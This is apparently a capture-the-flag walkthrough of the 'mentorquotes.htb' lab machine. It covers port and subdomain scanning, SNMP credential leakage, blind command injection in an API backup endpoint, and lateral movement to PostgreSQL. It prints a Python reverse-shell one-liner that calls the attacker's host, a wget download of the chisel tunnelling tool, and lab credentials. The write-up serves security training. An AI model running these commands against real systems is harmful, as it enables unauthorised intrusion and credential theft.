nmap -p- --min-rate 10000 10.10.11.193 -Pn 
After detection of open ports, let's do greater nmap scan for these ports.
nmap -A -sC -sV -p22,80 10.10.11.193 -Pn 
Let's do port scanning for UDP.
nmap -p- -sU --min-rate 10000 10.10.11.193 -Pn 
While browsing web application of this target, I see that ip is resolved into mentorquotes.htb, that's why I add this into /etc/hosts file.
Let's do subdomain enumeration via ffuf command.
ffuf -u http://10.10.11.193 -H "Host: FUZZ.mentorquotes.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 18 -mc all
Let's add api subdomain into /etc/hosts file also.
Now, it's time to do directory enumeration for api subdomain via gobuster command.
gobuster dir -u http://api.mentorquotes.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 40
While enumeration of SNMP via snmpwalk command, I see one password here.
snmpbulkwalk -v2c -c internal 10.10.11.193
Password: kj23sadkj123as0-d213
From /docs endpoint which is API Documentation.
I can see , there's valid user called james and his email is james@mentorquotes.htb.
Let's check password for this user on authentication endpoint.
Password worked for james user.
Let's fuzz endpoints via authenticated james user.
I can see /users endpoint after I got JWT Token on Authorization header of HTTP request.
Let's check do Directory Enumeration for /admin endpoint.
gobuster dir -u http://api.mentorquotes.htb/admin -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 40
I found /backup and /checkup endpoints for admin user.
But for /check endpoint, it is not implemented yet.
Let's enumerate /backup endpoint.
I see that POST request for /backup endpoint.
I need to enter path variable and value here.
Let's check Command Injection for path variable.
That's Blind Command Injection, I will try this by send ping to my endpoint.
I can see this result from tcpdump -i tun0.
Let's add reverse shell code into here.
I choose Python as because, from nmap scan, I saw that this application is running through Python Flask.
python -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.17\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';
Hola I got reverse shell from port 1337.
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/sh")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
I can see user.txt.
While enumeration on container, I find db.py file and read content of this.
From hard-coded credentials, I can access.
There I see that I can to postgreSQL service via Port Forwarding. Let's upload chisel into here.
python3 -m http.server --bind 10.10.14.17 8080
Then download this file via wget command.
wget http://10.10.14.17:8080/chisel_1.9.1_linux_amd64
Now, it's time for Remote Port Forwarding.
First, we need to create tunnel.
chisel server -p 8000 --reverse
Then, we need to connect to this channel to serve PostgreSQL.
./chisel_1.9.1_linux_amd64 client 10.10.14.17:8000 R:5432:172.22.0.1:5432
Let's access into PostgreSQL service on our machine.
psql -h 127.0.0.1 -p 5432 -U postgres
I put this hashes into Crackstation.
I found password of svc user.
svc: 123meunomeeivani
I read /etc/snmp/snmpd.conf file and hard-coded credential is here.
Maybe this password of james user.
james: SuperSecurePassword123__
While I run sudo -l command to check privileges of james user.
root.txt
